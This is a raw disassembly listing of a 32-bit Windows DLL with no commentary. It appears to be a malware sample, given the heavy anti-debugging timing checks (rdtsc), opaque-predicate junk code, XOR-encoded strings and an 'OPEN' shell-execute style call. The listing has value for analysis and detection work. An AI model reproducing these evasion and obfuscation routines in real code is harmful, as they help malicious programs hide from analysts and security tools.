db 0D4h
; ---------------------------------------------------------------------------
loc_1000629D: ; CODE XREF: CODE:10006348�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
loc_100062AD: ; CODE XREF: CODE:loc_100062AD�j
jg short loc_100062AD
not eax
stc
stc
jb near ptr loc_100062FB+6
add bh, ah
adc dword ptr [edi+310F1470h], 310FC88Bh ; CODE XREF: CODE:1000635C�j
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_100062D6
jmp near ptr 90E08773h
; ---------------------------------------------------------------------------
loc_100062D6: ; CODE XREF: CODE:100062CF�j
jmp short loc_100062DC
; ---------------------------------------------------------------------------
dd 18E89429h
; ---------------------------------------------------------------------------
loc_100062DC: ; CODE XREF: CODE:loc_100062D6�j
jmp short loc_100062E0
; ---------------------------------------------------------------------------
dw 58CEh
; ---------------------------------------------------------------------------
loc_100062E0: ; CODE XREF: CODE:loc_100062DC�j
stc
stc
jb loc_100062EE
add [eax-18h], bl
clc
cmc
pop eax
loc_100062EE: ; CODE XREF: CODE:100062E2�j
jmp short loc_100062F4
; ---------------------------------------------------------------------------
dd 60B8h
; ---------------------------------------------------------------------------
loc_100062F4: ; CODE XREF: CODE:loc_100062EE�j
stc
jb loc_10006368
loc_100062FB: ; CODE XREF: CODE:100062B3�j
add [esp+eax+0F75E7F7h], bl
xor [ebx+2B310FC8h], ecx
enter 0FFFFD1F7h, 81h
stc
; ---------------------------------------------------------------------------
db 2 dup(0), 1
dd 0EBFE7F00h, 0F9541902h, 36820Fh, 0E9000000h, 9AC43C2Fh
; ---------------------------------------------------------------------------
loc_10006324: ; CODE XREF: CODE:10006290�j
rdtsc
mov ecx, eax
loc_10006328: ; CODE XREF: CODE:10006397�j
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_1000633B
jmp near ptr 0D0412B95h
; ---------------------------------------------------------------------------
loc_1000633B: ; CODE XREF: CODE:10006334�j
push eax
push edx
rdtsc
xor ecx, eax
pop edx
xor ecx, eax
pop eax
not eax
stc
jb loc_1000629D
add [ebx-5Bh], ah
in al, 33h
out 0EBh, eax
add al, 8Dh
in al, 50h
lock stc
stc
jb near ptr loc_100062BB+4
add [edi+425E2C1h], ah
loc_10006368: ; CODE XREF: CODE:100062F5�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_1000637F
jmp near ptr 2010A7C4h
; ---------------------------------------------------------------------------
loc_1000637F: ; CODE XREF: CODE:10006378�j
xadd eax, eax
imul eax, eax
stc
jb loc_10006392
add [edx], ch
inc esi
sar byte ptr [edi+58h], cl
loc_10006392: ; CODE XREF: CODE:10006386�j
jmp loc_10006456
; ---------------------------------------------------------------------------
jno short loc_10006328
mov al, 0C3h
mov ds:677Dh, eax
loc_1000639F: ; CODE XREF: CODE:10006512�j
jmp short loc_100063AE
; ---------------------------------------------------------------------------
db 0C8h, 0A0h, 0
dd 2 dup(0)
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_100063AE: ; CODE XREF: CODE:loc_1000639F�j
jmp loc_1000643C
; ---------------------------------------------------------------------------
db 42h
dd 6EC3B0A6h
db 0C8h, 6Bh, 78h
; ---------------------------------------------------------------------------
loc_100063BB: ; CODE XREF: CODE:loc_100064D8�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
loc_100063CB: ; CODE XREF: CODE:loc_100063CB�j
jg short loc_100063CB
jmp loc_100064B9
; ---------------------------------------------------------------------------
dw 99E2h
dd 13CEC3B0h
; ---------------------------------------------------------------------------
dec edx
xchg eax, esi
loc_100063DA: ; CODE XREF: CODE:100064BC�j
push eax
push edx
rdtsc
xor ecx, eax
pop edx
xor ecx, eax
pop eax
jmp loc_10006588
; ---------------------------------------------------------------------------
fcomp qword ptr [edi+43C4C3B0h]
fst st(7)
loc_100063F1: ; CODE XREF: CODE:loc_1000653B�j
bswap edi
bswap edi
mov al, 17h
jmp loc_100064E5
; ---------------------------------------------------------------------------
dd 0C3B0AED6h, 3B782BAh
; ---------------------------------------------------------------------------
loc_10006404: ; CODE XREF: CODE:100064F7�j
jmp short loc_1000640A
; ---------------------------------------------------------------------------
dw 0BCFBh
; ---------------------------------------------------------------------------
adc al, 0B0h
loc_1000640A: ; CODE XREF: CODE:loc_10006404�j
mov al, 0ADh
inc ecx
jmp loc_100064A1
; ---------------------------------------------------------------------------
dw 0B329h
dd 0A6EFC3B0h
db 47h, 0D1h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000657A
loc_1000641A: ; CODE XREF: sub_1000657A+1�j
jmp short loc_10006427
; END OF FUNCTION CHUNK FOR sub_1000657A
; ---------------------------------------------------------------------------
dd 0A02084D5h, 0A0h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000657A
loc_10006427: ; CODE XREF: sub_1000657A:loc_1000641A�j
push 4050h
add esp, 4
jmp loc_100065A9
; END OF FUNCTION CHUNK FOR sub_1000657A
; ---------------------------------------------------------------------------
or al, 0B0h
retn
; ---------------------------------------------------------------------------
and byte ptr [ebx], 0C6h
xchg eax, ebp
loc_1000643C: ; CODE XREF: CODE:loc_100063AE�j
push eax
push edx
rdtsc
xor ecx, eax
pop edx
xor ecx, eax
pop eax
jmp short loc_10006449
; ---------------------------------------------------------------------------
db 6Eh
; ---------------------------------------------------------------------------
loc_10006449: ; CODE XREF: CODE:10006446�j
jmp loc_10006532
; ---------------------------------------------------------------------------
sub [edx-68103C50h], ebp
add bh, ah
loc_10006456: ; CODE XREF: CODE:loc_10006392�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
loc_10006466: ; CODE XREF: CODE:loc_10006466�j
jg short loc_10006466
mov al, 0BCh
jmp loc_10006490
; ---------------------------------------------------------------------------
db 65h
dd 53C3B092h
db 0F4h, 5Ch, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10006558
loc_10006477: ; CODE XREF: sub_10006558-33�j
push 0C0F0h
add esp, 4
jmp short loc_10006482
; END OF FUNCTION CHUNK FOR sub_10006558
; ---------------------------------------------------------------------------
dec esi
; START OF FUNCTION CHUNK FOR sub_10006558
loc_10006482: ; CODE XREF: sub_10006558-D9�j
inc ecx
jmp loc_1000656A
; END OF FUNCTION CHUNK FOR sub_10006558
; ---------------------------------------------------------------------------
dd 0C3B0C1B7h, 9E269131h
; ---------------------------------------------------------------------------
loc_10006490: ; CODE XREF: CODE:1000646A�j
bt eax, eax
inc ecx
jmp loc_100064C9
; ---------------------------------------------------------------------------
db 98h, 95h, 0B0h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0A8h, 36h, 0A4h
db 0D0h
; ---------------------------------------------------------------------------
loc_100064A1: ; CODE XREF: CODE:1000640D�j
bswap edi
bswap edi
jmp short loc_100064A9
; ---------------------------------------------------------------------------
db 0Dh
db 0E4h
; ---------------------------------------------------------------------------
loc_100064A9: ; CODE XREF: CODE:100064A5�j
imul eax, eax
jmp loc_10006548
; ---------------------------------------------------------------------------
db 34h, 0B7h, 0B0h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0ACh, 92h, 85h
; ---------------------------------------------------------------------------
pop edi
loc_100064B9: ; CODE XREF: CODE:100063CD�j
bt eax, eax
jmp loc_100063DA
; ---------------------------------------------------------------------------
db 0Bh, 9Bh, 0B0h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0BDh, 3Ch, 7Dh
; ---------------------------------------------------------------------------
wait
loc_100064C9: ; CODE XREF: CODE:10006494�j
jmp short loc_100064D8
; ---------------------------------------------------------------------------
db 86h
dd 105070B8h, 0C04060h, 0
; ---------------------------------------------------------------------------
loc_100064D8: ; CODE XREF: CODE:loc_100064C9�j
jmp loc_100063BB
; ---------------------------------------------------------------------------
db 0C1h, 96h, 0B0h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 97h, 5Fh, 0D7h
db 0D5h
; ---------------------------------------------------------------------------
loc_100064E5: ; CODE XREF: CODE:100063F7�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
loc_100064F5: ; CODE XREF: CODE:loc_100064F5�j
jg short loc_100064F5
jmp loc_10006404
; ---------------------------------------------------------------------------
dd 0C3B0B06Bh, 67E6005Dh
; ---------------------------------------------------------------------------
loc_10006504: ; CODE XREF: CODE:1000659C�j
push 9469h
add esp, 4
jmp short loc_10006510
; ---------------------------------------------------------------------------
dw 80h
; ---------------------------------------------------------------------------
loc_10006510: ; CODE XREF: CODE:1000650C�j
mov al, 50h
jmp loc_1000639F
; ---------------------------------------------------------------------------
cmp [eax+esi*4+57AF08C3h], ah
lodsd
; START OF FUNCTION CHUNK FOR sub_10006558
loc_1000651F: ; CODE XREF: sub_10006558:loc_1000655D�j
mov al, 23h
inc ecx
push 0FFFFFFDFh
pop eax
jmp loc_10006477
; END OF FUNCTION CHUNK FOR sub_10006558
; ---------------------------------------------------------------------------
dw 0BD64h
dd 6CFCC3B0h
db 96h, 0D0h
; ---------------------------------------------------------------------------
loc_10006532: ; CODE XREF: CODE:loc_10006449�j
jmp short loc_10006538
; ---------------------------------------------------------------------------
dd 68A8245Dh
; ---------------------------------------------------------------------------
loc_10006538: ; CODE XREF: CODE:loc_10006532�j
jmp short loc_1000653B
; ---------------------------------------------------------------------------
dec ebp
loc_1000653B: ; CODE XREF: CODE:loc_10006538�j
jmp loc_100063F1
; ---------------------------------------------------------------------------
dd 0C3B0AB9Ah, 2B85F956h
; ---------------------------------------------------------------------------
loc_10006548: ; CODE XREF: CODE:100064AC�j
call sub_10006558
cmpsb
cmp [eax+40h], ah
inc eax
; ---------------------------------------------------------------------------
dw 0
align 8
; =============== S U B R O U T I N E =======================================
sub_10006558 proc near ; CODE XREF: CODE:loc_10006548�p
; FUNCTION CHUNK AT 10006477 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 10006482 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 1000651F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 1000656A SIZE 0000000E BYTES
pop eax
jmp short loc_1000655D
; ---------------------------------------------------------------------------
db 1
db 74h
; ---------------------------------------------------------------------------
loc_1000655D: ; CODE XREF: sub_10006558+1�j
jmp loc_1000651F
sub_10006558 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 0BB00h
dd 8D00C3B0h
db 5Bh, 0B6h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_10006558
loc_1000656A: ; CODE XREF: sub_10006558-D5�j
call sub_1000657A
pop ebx
cmp al, 4
cmp [eax+0], al
; END OF FUNCTION CHUNK FOR sub_10006558
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_1000657A proc near ; CODE XREF: sub_10006558:loc_1000656A�p
var_471CB918 = byte ptr -471CB918h
arg_0 = byte ptr 4
; FUNCTION CHUNK AT 1000641A SIZE 00000002 BYTES
; FUNCTION CHUNK AT 10006427 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 100065A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 100065B6 SIZE 0000004C BYTES
; FUNCTION CHUNK AT 10006603 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 1000661D SIZE 00000059 BYTES
; FUNCTION CHUNK AT 10006679 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 10006694 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 100066B1 SIZE 00000038 BYTES
pop eax
jmp loc_1000641A
sub_1000657A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0C3B0C370h, 21FE2B10h
; ---------------------------------------------------------------------------
loc_10006588: ; CODE XREF: CODE:100063E4�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
loc_10006598: ; CODE XREF: CODE:loc_10006598�j
jg short loc_10006598
mov al, 6Fh
jmp loc_10006504
; ---------------------------------------------------------------------------
db 72h, 0A3h, 0B0h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0BEh, 93h, 35h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000657A
loc_100065A9: ; CODE XREF: sub_1000657A-14B�j
jmp loc_10006603
; END OF FUNCTION CHUNK FOR sub_1000657A
; ---------------------------------------------------------------------------
dw 0B8EEh
dd 50E25C78h
db 36h, 0F0h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000657A
loc_100065B6: ; CODE XREF: sub_1000657A+11B�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_100065CD
jmp near ptr 0B0E12EA7h
; ---------------------------------------------------------------------------
loc_100065CD: ; CODE XREF: sub_1000657A+4C�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_100065E4
jmp near ptr 8010DEDAh
; ---------------------------------------------------------------------------
loc_100065E4: ; CODE XREF: sub_1000657A+63�j
stc
stc
jb near ptr loc_100066A0+1
add dl, dh
db 3Eh
jl short near ptr loc_1000663C+4
sub bl, ch ; CODE XREF: sub_1000657A+159�j
add eax, edi
stc
stc
jb near ptr loc_10006664+3
add [esp+edi-4+arg_0], ah
in al, dx
insb
; END OF FUNCTION CHUNK FOR sub_1000657A
; ---------------------------------------------------------------------------
db 35h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000657A
loc_10006603: ; CODE XREF: sub_1000657A:loc_100065A9�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_1000661A
jmp near ptr 24ED6265h
; ---------------------------------------------------------------------------
loc_1000661A: ; CODE XREF: sub_1000657A+99�j
jmp short loc_1000661D
; END OF FUNCTION CHUNK FOR sub_1000657A
; ---------------------------------------------------------------------------
db 6Fh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000657A
loc_1000661D: ; CODE XREF: sub_1000657A:loc_1000661A�j
stc
jb loc_1000662A
add bl, cl
std
imul dword ptr [edi-57h]
loc_1000662A: ; CODE XREF: sub_1000657A+A4�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10006641
loc_1000663C: ; CODE XREF: sub_1000657A+74�j
jmp near ptr 88854A8Eh
; ---------------------------------------------------------------------------
loc_10006641: ; CODE XREF: sub_1000657A+C0�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10006658
jmp near ptr 9080E6B8h
; ---------------------------------------------------------------------------
loc_10006658: ; CODE XREF: sub_1000657A+D7�j
not eax
stc
jb loc_10006679
add [ecx-51h], ch
loc_10006664: ; CODE XREF: sub_1000657A+7D�j
mov esp, 1EB1588h
sal bh, 1
sar cl, 1
jb near ptr loc_100066D9+6
add al, cl
clc
; END OF FUNCTION CHUNK FOR sub_1000657A
; ---------------------------------------------------------------------------
dw 398Fh
; ---------------------------------------------------------------------------
dec edx
; START OF FUNCTION CHUNK FOR sub_1000657A
loc_10006679: ; CODE XREF: sub_1000657A+E1�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_10006690
jmp near ptr 0D0791AA1h
; ---------------------------------------------------------------------------
loc_10006690: ; CODE XREF: sub_1000657A+10F�j
jmp short loc_10006694
; END OF FUNCTION CHUNK FOR sub_1000657A
; ---------------------------------------------------------------------------
dw 1409h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000657A
loc_10006694: ; CODE XREF: sub_1000657A:loc_10006690�j
stc
jb loc_100065B6
add [esi], bl
xor bl, [eax+eax]
loc_100066A0: ; CODE XREF: sub_1000657A+6C�j
ja short loc_100066B1
xor [ebx+2B310FC8h], ecx
enter 0FFFFD1F7h, 81h
stc
; END OF FUNCTION CHUNK FOR sub_1000657A
; ---------------------------------------------------------------------------
db 2 dup(0), 1
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_1000657A
loc_100066B1: ; CODE XREF: sub_1000657A:loc_100066A0�j
jl short loc_100066B8
jmp near ptr 10E95F4Eh
; ---------------------------------------------------------------------------
loc_100066B8: ; CODE XREF: sub_1000657A:loc_100066B1�j
rdtsc
mov ecx, eax
rdtsc
sub ecx, eax
not ecx
cmp ecx, 10000h
jl short loc_100066CF
jmp near ptr 7C9CD366h
; ---------------------------------------------------------------------------
loc_100066CF: ; CODE XREF: sub_1000657A+14E�j
push 0
pop eax
stc
jb near ptr loc_100065F1+1
loc_100066D9: ; CODE XREF: sub_1000657A+F3�j
add [esp-2E08h+var_471CB918], bh
sal byte ptr [eax+eax-4536CCF0h], 1
adc [eax], al
; END OF FUNCTION CHUNK FOR sub_1000657A
; ---------------------------------------------------------------------------
db 2 dup(0), 0E8h
dd 0FFFFAD50h, 0D005C766h, 121000B4h, 5C76608h, 1000B4D2h
dd 0C766000Bh, 0B4D605h, 68001310h, 1000B4D0h, 0B4FC15FFh
dd 0C0851000h, 5C61274h, 1000B4F0h, 2EE06801h, 15FF0000h
dd 10008848h
; ---------------------------------------------------------------------------
loc_1000672C: ; CODE XREF: CODE:1000627F�j
mov eax, offset dword_1000B4B8
call sub_100016D8
call sub_10001320
test eax, eax
jle short loc_10006781
mov [ebp-14h], eax
mov ds:dword_1000B4B4, 1
loc_1000674C: ; CODE XREF: CODE:1000677F�j
push ds:dword_1000B4B8
push offset dword_10006CF8
lea edx, [ebp-74h]
mov eax, ds:dword_1000B4B4
call sub_10001380
push dword ptr [ebp-74h]
mov eax, offset dword_1000B4B8
mov edx, 3
call sub_100018A0
inc ds:dword_1000B4B4
dec dword ptr [ebp-14h]
jnz short loc_1000674C
loc_10006781: ; CODE XREF: CODE:1000673D�j
call sub_10001320
test eax, eax
jnz short loc_100067E0
lea eax, [ebp-78h]
mov edx, offset byte_10008955
mov ecx, 100h
call sub_1000183C
cmp dword ptr [ebp-78h], 0
jz short loc_100067E0
mov eax, offset dword_1000B4B8
mov edx, offset dword_10006CF8
call sub_1000172C
lea eax, [ebp-80h]
mov edx, offset byte_10008955
mov ecx, 100h
call sub_1000183C
mov eax, [ebp-80h]
lea ecx, [ebp-7Ch]
mov edx, 20200437h
call sub_100022B8
mov edx, [ebp-7Ch]
mov eax, offset dword_1000B4B8
call sub_1000185C
loc_100067E0: ; CODE XREF: CODE:10006788�j
; CODE:100067A0�j
mov eax, offset dword_1000B4C8
call sub_100016D8
cmp ds:byte_10008854, 0
jz loc_100068F2
lea eax, [ebp-84h]
mov edx, offset byte_10008855
mov ecx, 100h
call sub_1000183C
cmp dword ptr [ebp-84h], 0
jz loc_100068AC
lea eax, [ebp-90h]
mov edx, offset byte_10008855
mov ecx, 100h
call sub_1000183C
mov eax, [ebp-90h]
lea ecx, [ebp-8Ch]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-8Ch]
lea edx, [ebp-88h]
call sub_10004EF0
cmp dword ptr [ebp-88h], 0
jz short loc_100068AC
lea eax, [ebp-9Ch]
mov edx, offset byte_10008855
mov ecx, 100h
call sub_1000183C
mov eax, [ebp-9Ch]
lea ecx, [ebp-98h]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-98h]
lea edx, [ebp-94h]
call sub_10004EF0
mov edx, [ebp-94h]
mov eax, offset dword_1000B4C8
call sub_1000172C
jmp short loc_100068DB
; ---------------------------------------------------------------------------
loc_100068AC: ; CODE XREF: CODE:10006813�j
; CODE:1000685C�j
lea eax, [ebp-0A0h]
call sub_100036EC
cmp dword ptr [ebp-0A0h], 0
jz short loc_100068DB
lea eax, [ebp-0A4h]
call sub_100036EC
mov edx, [ebp-0A4h]
mov eax, offset dword_1000B4C8
call sub_1000172C
loc_100068DB: ; CODE XREF: CODE:100068AA�j
; CODE:100068BE�j
cmp ds:dword_1000B4C8, 0
jnz short loc_100068FE
mov edx, offset dword_1000B4C8
xor eax, eax
call sub_10001380
jmp short loc_100068FE
; ---------------------------------------------------------------------------
loc_100068F2: ; CODE XREF: CODE:100067F1�j
mov edx, offset dword_1000B4C8
xor eax, eax
call sub_10001380
loc_100068FE: ; CODE XREF: CODE:100068E2�j
; CODE:100068F0�j
mov edx, offset aDjgp ; "DJGP"
mov eax, offset dword_1000B4C4
call sub_10004D04
mov ds:dword_1000B4C0, eax
mov eax, offset dword_1000B4BC
mov edx, ds:dword_1000B4C4
call sub_10001AB4
mov eax, offset dword_1000B4BC
call sub_10001A24
mov edx, eax
mov eax, ds:dword_1000B4C0
mov ecx, ds:dword_1000B4C4
call sub_100011D4
lea eax, [ebp-0A8h]
mov edx, offset dword_1000B39C
mov ecx, 100h
call sub_1000183C
cmp dword ptr [ebp-0A8h], 0
jnz short loc_100069CA
cmp ds:byte_10008A56, 0
jz short loc_100069A0
lea ecx, [ebp-0B0h]
mov edx, 20200437h
mov eax, ds:dword_1000B4BC
call sub_100022B8
mov eax, [ebp-0B0h]
lea edx, [ebp-0ACh]
call sub_100021E8
mov edx, [ebp-0ACh]
mov eax, offset dword_1000B4BC
call sub_1000172C
jmp loc_10006A96
; ---------------------------------------------------------------------------
loc_100069A0: ; CODE XREF: CODE:10006963�j
lea ecx, [ebp-0B4h]
mov edx, 20200437h
mov eax, ds:dword_1000B4BC
call sub_100022B8
mov edx, [ebp-0B4h]
mov eax, offset dword_1000B4BC
call sub_1000172C
jmp loc_10006A96
; ---------------------------------------------------------------------------
loc_100069CA: ; CODE XREF: CODE:1000695A�j
cmp ds:byte_10008A56, 0
jz short loc_10006A3E
lea eax, [ebp-0C4h]
mov edx, offset dword_1000B39C
mov ecx, 100h
call sub_1000183C
mov eax, [ebp-0C4h]
lea ecx, [ebp-0C0h]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-0C0h]
call sub_10005B8C
mov edx, eax
lea ecx, [ebp-0BCh]
mov eax, ds:dword_1000B4BC
call sub_100022B8
mov eax, [ebp-0BCh]
lea edx, [ebp-0B8h]
call sub_100021E8
mov edx, [ebp-0B8h]
mov eax, offset dword_1000B4BC
call sub_1000172C
jmp short loc_10006A96
; ---------------------------------------------------------------------------
loc_10006A3E: ; CODE XREF: CODE:100069D1�j
lea eax, [ebp-0D0h]
mov edx, offset dword_1000B39C
mov ecx, 100h
call sub_1000183C
mov eax, [ebp-0D0h]
lea ecx, [ebp-0CCh]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-0CCh]
call sub_10005B8C
mov edx, eax
lea ecx, [ebp-0C8h]
mov eax, ds:dword_1000B4BC
call sub_100022B8
mov edx, [ebp-0C8h]
mov eax, offset dword_1000B4BC
call sub_1000172C
loc_10006A96: ; CODE XREF: CODE:1000699B�j
; CODE:100069C5�j ...
cmp ds:byte_10008A58, 0
jz short loc_10006AFA
mov al, ds:byte_10008A55
push eax
mov eax, offset dword_1000B4BC
call sub_10001A24
mov ecx, ds:dword_1000B4B8
mov edx, ds:dword_1000B4C8
call sub_1000292C
test al, al
jnz loc_10006B4F
mov al, ds:byte_10008A55
push eax
lea edx, [ebp-0D4h]
xor eax, eax
call sub_10001380
mov eax, [ebp-0D4h]
push eax
mov eax, offset dword_1000B4BC
call sub_10001A24
mov ecx, ds:dword_1000B4B8
pop edx
call sub_1000292C
jmp short loc_10006B4F
; ---------------------------------------------------------------------------
loc_10006AFA: ; CODE XREF: CODE:10006A9D�j
mov al, ds:byte_10008A55
push eax
mov eax, offset dword_1000B4BC
call sub_10001A24
mov ecx, ds:dword_1000B4B8
mov edx, ds:dword_1000B4C8
call sub_100031E0
test al, al
jnz short loc_10006B4F
mov al, ds:byte_10008A55
push eax
lea edx, [ebp-0D8h]
xor eax, eax
call sub_10001380
mov eax, [ebp-0D8h]
push eax
mov eax, offset dword_1000B4BC
call sub_10001A24
mov ecx, ds:dword_1000B4B8
pop edx
call sub_100031E0
loc_10006B4F: ; CODE XREF: CODE:10006AC2�j
; CODE:10006AF8�j ...
cmp ds:byte_1000B49C, 1
jnz short loc_10006B6C
cmp ds:byte_1000B4F0, 1
jnz short loc_10006B6C
push offset dword_1000B4E0
call ds:dword_1000B4FC
loc_10006B6C: ; CODE XREF: CODE:10006B56�j
; CODE:10006B5F�j
cmp ds:byte_1000B4AD, 1
jnz loc_10006C12
cmp ds:byte_1000B4F1, 1
jnz loc_10006C12
push 6A4h
call ds:dword_10008848
push 0
push 0
lea ecx, [ebp-0E0h]
mov edx, 20200437h
mov eax, offset dword_10006D0C
call sub_100022B8
push dword ptr [ebp-0E0h]
lea edx, [ebp-0E4h]
xor eax, eax
call sub_10001380
push dword ptr [ebp-0E4h]
push offset dword_10006D3C
lea eax, [ebp-0DCh]
mov edx, 3
call sub_100018A0
mov eax, [ebp-0DCh]
call sub_100019D8
push eax
lea ecx, [ebp-0E8h]
mov edx, 20200437h
mov eax, offset dword_10006D48
call sub_100022B8
mov eax, [ebp-0E8h]
call sub_100019D8
push eax
push offset aOpen ; "OPEN"
push 0
call ds:dword_1000B4F4
loc_10006C12: ; CODE XREF: CODE:10006B73�j
; CODE:10006B80�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10006C37
loc_10006C1F: ; CODE XREF: CODE:10006C35�j
lea eax, [ebp-0E8h]
mov edx, 35h
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_10006C30: ; DATA XREF: CODE:10005CEC�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10006C1F
; ---------------------------------------------------------------------------
loc_10006C37: ; CODE XREF: CODE:10006C2F�j
; DATA XREF: CODE:10006C1A�o
call sub_100015F0
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 0Dh
dword_10006C44 dd 565C5064h, 5B457957h, 2735355Ch, 2, 0FFFFFFFFh, 0Dh
; DATA XREF: CODE:10005D48�o
dword_10006C5C dd 694D5D70h, 5B494F42h, 2F281452h, 26h, 0FFFFFFFFh, 0Dh
; DATA XREF: CODE:10005D74�o
dword_10006C74 dd 694D5D64h, 5B494F42h, 2F281452h, 26h, 0FFFFFFFFh, 0Bh
; DATA XREF: CODE:10005DA0�o
dword_10006C8C dd 494A5D7Ah, 7C585B5Ah, 3850haZqfgf db 'ZQFGF',0 ; DATA XREF: CODE:10005DF0�o
align 10h
aError db 'Error',0 ; DATA XREF: CODE:10005E8C�o
align 4
dd 0FFFFFFFFh, 3Fh
dword_10006CB0 dd 1A5C5063h, 5B49525Eh, 6225254Dh, 35362533h, 2E3B2730h
; DATA XREF: CODE:10005E99�o
dd 3D2C3B6Bh, 313F396Fh, 3327263Ch, 7A772C34h, 7E38340Fh
dd 50E122Fh, 46080511h, 6050110h, 1902024Bh, 1D1D134Fh
dd 5B1100h, 0FFFFFFFFh, 1
dword_10006CF8 dd 20h ; CODE:100067A7�o
aDjgp db 'DJGP',0 ; DATA XREF: CODE:loc_100068FE�o
align 4
dd 0FFFFFFFFh, 24h
dword_10006D0C dd 5E195B18h, 181D4E52h, 2B256019h, 60636431h, 38202C67h
; DATA XREF: CODE:10006BA0�o
dd 6E6B6A6Bh, 7223392Bh, 32757275h, 78793432h, 0
dd 0FFFFFFFFh, 1
dword_10006D3C dd 22h, 0FFFFFFFFh, 7dword_10006D48 dd 145D5554h, 58445EhaOpen db 'OPEN',0 ; DATA XREF: CODE:10006C05�o
align 4
dd 2Ah dup(0)
dd 80h dup(?)
CODE ends
; Section 2. (virtual address 00007000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00006200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 10007000h
dword_10007000 dd 0 ; sub_100015F0+9�o ...
dword_10007004 dd 0 ; sub_100015F0:loc_1000161F�r ...
dword_10007008 dd 0 word_1000700C dw 1332h ; DATA XREF: sub_1000141C�w
; sub_1000141C+8�r
dw 0C08Bh
byte_10007010 db 0 ; DATA XREF: sub_10001480�r
db 8Dh, 40h, 0
dword_10007014 dd 0 ; sub_10001D14+8�w
dword_10007018 dd 0 off_1000701C dd offset sub_10001D24 ; DATA XREF: sub_100015F0+66�r
off_10007020 dd offset sub_10001514 ; DATA XREF: sub_10001514+F�r
; sub_10001514+35�r ...
off_10007024 dd offset sub_100014E0 ; DATA XREF: sub_100015F0:loc_1000163E�r
off_10007028 dd offset nullsub_1 ; DATA XREF: sub_100015F0:loc_10001671�r
off_1000702C dd offset nullsub_1 ; DATA XREF: CODE:10001D7B�r
; DWORD dwFlags
dwFlags dd 0 ; DATA XREF: sub_100010A0+1�r
; sub_100010B4+4�r ...
off_10007034 dd offset sub_100010A0 ; DATA XREF: sub_100010F0+4�r
; sub_10001120+3F�r
off_10007038 dd offset sub_100010B4 ; DATA XREF: sub_10001108+4�r
; sub_10001120+26�r ...
off_1000703C dd offset sub_100010D8 ; DATA XREF: sub_10001120+D�r
byte_10007040 db 0 ; DATA XREF: sub_1000117C+36�r
aRsu db 'ΛΜΘΙΧΟΘΝΞΫΨΚΩΪάέήίΰαγ',0
aFxn@ db 'δε@',0
off_1000705C dd offset nullsub_1 ; DATA XREF: sub_100015F0+38�r
off_10007060 dd offset nullsub_1 ; DATA XREF: CODE:10001D75�r
off_10007064 dd offset aPortionsCopyri ; DATA XREF: CODE:10001F19�o
; "Portions Copyright (c) 1999,2003 Avenge"...
; DWORD TlsIndex
TlsIndex dd 0FFFFFFFFh ; DATA XREF: sub_10001E2C+C�r
